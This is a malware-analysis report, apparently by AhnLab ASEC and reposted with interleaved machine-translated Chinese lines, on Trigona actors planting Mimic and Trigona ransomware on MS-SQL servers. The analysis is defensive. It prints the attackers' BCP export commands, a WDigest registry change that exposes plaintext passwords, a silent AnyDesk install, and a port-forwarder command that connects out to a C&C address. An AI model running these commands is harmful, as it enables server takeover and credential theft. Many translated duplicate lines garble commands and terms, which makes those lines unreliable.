Trigona Ransomware Threat Actor Uses Mimic Ransomware

AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.

  • Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
  • Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].
    模仿勒索软件:首次发现于2022年6月[2]。2024年1月,一个讲土耳其语的威胁行为者攻击了管理不善的MS-SQL服务器并安装了Mimic [3]。

ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4].

Accordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in attacks were the same. In addition, the same malware was used in each attack case.

1. Trigona Ransomware

Trigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].

MS-SQL servers were targeted again in the recent attack case like cases of 2023, and with the threat actor’s email address saved in the ransom note, it can be confirmed that the recently detected Trigona ransomware’s threat actor is the same attacker responsible for previous cases.

  • Email: farusbig@tutanota[.]com
  • URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 1. Encrypted files and ransom note

2. Mimic Ransomware 2. Mimic勒索软件

Mimic ransomware is known for exploiting a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware the source code of which was leaked during the development stage [7].

The Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 almost had the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll” which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and “Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.
2023年1月发布的趋势科技报告和2024年1月发布的Securonix报告中的Mimic勒索软件样本与此次攻击中使用的外部结构几乎相同。该恶意软件被制作成7z SFX可执行文件,并包含一个名为“Everything64.dll”的压缩文件,该文件是实际恶意软件文件和Everything工具的密码保护集合。当恶意软件执行时,7z和“Everything64.dll”压缩文件将使用如下所示的适当密码进行解压缩。

> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll
Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 2. Files included in 7z SFX and the compressed file
图2. 7z SFX中包含的文件和压缩文件

The folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of Sysinternals.
最终安装的文件夹不仅包含Mimic勒索软件和Everything工具,还包含用于停用Windows Defender的Defender Control工具(DC.exe)和Sysinternals的SDelete工具(xdel.exe)。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 3. Installed files

The threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks based on multiple circumstances that will be discussed later in this post.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 4. Encrypted files and ransom note

3. Malware Installed Using BCP

Attack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also from infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack processes.
攻击目标被认为是管理不善和外部暴露的MS-SQL服务器,这些服务器具有简单的帐户凭据,使它们容易受到暴力攻击或字典攻击。这不仅可以从Trigona勒索软件威胁行为者过去一直针对这些系统进行攻击的事实中推断出来,还可以从包括LoveMiner和Remcos RAT在内的恶意软件在各自攻击过程前后的感染日志中推断出来。

3.1. Files Created Using BCP

The BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data saved in the tables of the SQL servers as a local file or to export data files saved in the local system to the SQL server tables.

Threat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently, some have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. However, in the case of this attack case, the threat actor most likely employed the method of saving their malware in a database and using BCP to create a local file from it.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 5. Malware created using BCP

The threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 6. BCP command used in the attacks

The following are BCP commands used to export various malware and tools used in the attacks.

  • Anydesk
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\AD.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Port forwarder malware 端口转发恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\4.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Launcher malware Launcher恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\pp2.exe”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\pp2.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Mimic ransomware 模拟勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\K2K.txt”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\K3K.txt”-T -f“C:\users\%ASD%\FODsOZKgAU.txt”
  • Trigona ransomware Trigona勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\build.txt”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Others 别人
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\kkk.bat”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\kur.bat”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\kkk.bat”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”

3.2. Looking Up Information

The commands that the threat actor first executes before creating the malware with BCP (meaning that the attack was successful) are those that look up the infected system’s information as shown below. The threat actor would install malware suitable for the environment based on the information gained through these commands.

> hostname >主机名
> whoami
> wmic computersystem get domain
> wmic computersystem get totalphysicalmemory
> wmic计算机系统获取总物理内存

3.3. Stealing Account Credentials

The Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command to configure the UseLogonCredential registry key to obtain the plain text password using the WDigest security package.
已知Trigona威胁行为者使用Mimikatz窃取帐户凭据[9][10]。虽然在攻击过程中没有发现Mimikatz的日志,但攻击者有时会执行一个命令来配置WDigest LogonCredential注册表项,以使用WDigest安全包获取纯文本密码。

> REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001
> REG ADD“HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest”/v登录凭据/t REG_DWORD /d 0x 0000001

3.4. AnyDesk 3.4. AnyDesk。

In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.

AnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial access or lateral movement phases to control the target system.

> %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent
> %SystemDrive%\users\%ASD%\music\AD.exe -install C:\“Program Files(x86)”\ -silent

> %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id”
> %SystemDrive%\“Program Files(x86)”\AnyDesk-ad_1514b2f9.exe -get-id”

4. Analysis of Malware Used in the Attack

Besides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe mode being utilized. Two additional malware deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.

One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.

According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.
根据PDB信息,威胁行为者将启动器恶意软件命名为“app 2”,将端口转发器命名为“client”。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 7. Malware created by the threat actor with similar PDB information

Although no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified as shown below. As the launcher deactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.
虽然没有发现将系统靴子选项设置为安全模式的恶意软件或命令日志,但已确定MS-SQL Server进程执行系统重新启动命令的日志,如下所示。由于启动器在执行作为参数给出的恶意软件后停用了安全模式靴子选项,因此威胁行为者很可能安装了恶意软件,然后在安全模式下重新启动系统以运行勒索软件。

> shutdown -r -f -t 5

4.1. Launcher Malware 4.1.启动器恶意软件

The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”
> %ALLUSERSPROFILE%\pp2.exe 111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”

The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware

4.2. Port Forwarder 4.2.港口货运代理

The threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature where data transmitted from a certain port is forwarded to another port. This malware supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access the NAT environment from outside.

The port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, malware may execute the following commands to additionally enable the RDP service.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 9. RDP service activation routine
图9. RDP服务激活例程

When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.

> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install
> %SystemDrive%\users\%ASD%\music\4.exe -ip“2.57.149[.] 233”-端口“3366”-安装

The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.

Argument 论点 Description 描述
–install – 安装 Installation mode 安装模式
–uninstall – 卸载 Uninstallation mode 卸载模式
–run – 快跑 Execution mode 执行模式
–ip -ip C&C server’s IP address C&C服务器的IP地址
–port – 端口 C&C server’s port number C&C服务器的端口号
Table 1. Port forwarder arguments

Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 10. System information forwarded to the C&C server

Then, it can perform port forwarding or auto-deletion commands based on the commands it receives from the C&C server.

Command 命令 Feature 特征
0x8CC03FAF Start port forwarding between the C&C server and the RDP service
0x0002C684 Auto-delete 自动删除
Table 2. Port forwarder arguments

5. Conclusion 5.结论

Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely.

Ransomware threat actors encrypt infected systems and extort sensitive information to threaten the victims to raise profits. Because they employ various techniques for account credential theft and lateral movement, single systems as well as the entire internal company network may be at risk of being compromised, resulting in having sensitive data stolen and systems in the network encrypted.

Typical attacks that target MS-SQL servers include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks.

V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.

File Detection 文件检测
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– Trojan/Win.Generic.R531737(2022.10.27.00)

– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– HackTool/Win.DefenderControl.C5481630(2023.09.06.00)

– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Mimic.C5543473(2023.11.18.01)

– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)

– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574264(2024.01.14.03)

– Trojan/Win.Agent.C5574265 (2024.01.14.03)
– Trojan/Win.Agent.C5574265(2024.01.14.03)

Behavior Detection 行为检测Behaviour Detection
– Malware/MDP.Minipulate.M71
– 恶意软件/MDP.Minipulate.M71

– Persistence/MDP.AutoRun.M203
– 持久性/MDP.AutoRun.M203

– DefenseEvasion/MDP.ModifyRegistry.M1234
– DefenseEvasion/MDP.ModifyRegistry.M1234

– Ransom/MDP.Decoy.M1171 – Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367
– CredentialAccess/MDP.Mimikatz.M4367


– a24bac9071fb6e07e13c52f65a093fce: Launcher (pp2.exe)
– a24 bac 9071 fb 6 e07 e13 c52 f65 a093 fce:启动器(pp2.exe)

– a6e2722cff3abb214dc1437647964c57: Launcher (pp2.exe)
– a6 e2722 cff 3abb 214 dc 1437647964 c57:启动器(pp2.exe)

– 3e26e778a4d28003686596f988942646: Port Forwarder (4.exe)
-3e 26 e778 a4 d28003686596 f988942646:端口转发器(4.exe)

– d6b4b1b6b0ec1799f57142798c5daf5b: Mimic Ransomware Dropper (K2K.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b:Mimic Ransomware Dropper(K2K.exe)

– 6d44f8f3c1608e5958b40f9c6d7b6718: Mimic Ransomware Dropper (K3K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718:Mimic Ransomware Dropper(K3K.exe)

– b3c8d81d6f8d19e5c07e1ca7932ed5bf: Mimic Ransomware (K2K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf:Mimic Ransomware(K2K.exe)

– a02157550bc9b491fd03cad394ccdfe7: Mimic Ransomware (3usdaa.exe)
– a02157550bc9b491fd03cad394ccdfe7:Mimic Ransomware(3usdaa.exe)

– c28b33f7365f9dc72cc291d13458f334: Trigona Ransomware (build.txt)
– c28b33f7365f9dc72cc291d13458f334:Trigona Ransomware(build.txt)

– ac34ba84a5054cd701efad5dd14645c9: Defender Control (DC.exe)
– ac34ba84a5054cd701efad5dd14645c9:Defender Control(DC.exe)

– 2.57.149[.]233:3366 – 2.57.149[.]二三三:三三六六

原文始发于ASEC:Trigona Ransomware Threat Actor Uses Mimic Ransomware

版权声明:admin 发表于 2024年2月6日 下午1:15。
转载请注明:Trigona Ransomware Threat Actor Uses Mimic Ransomware | CTF导航
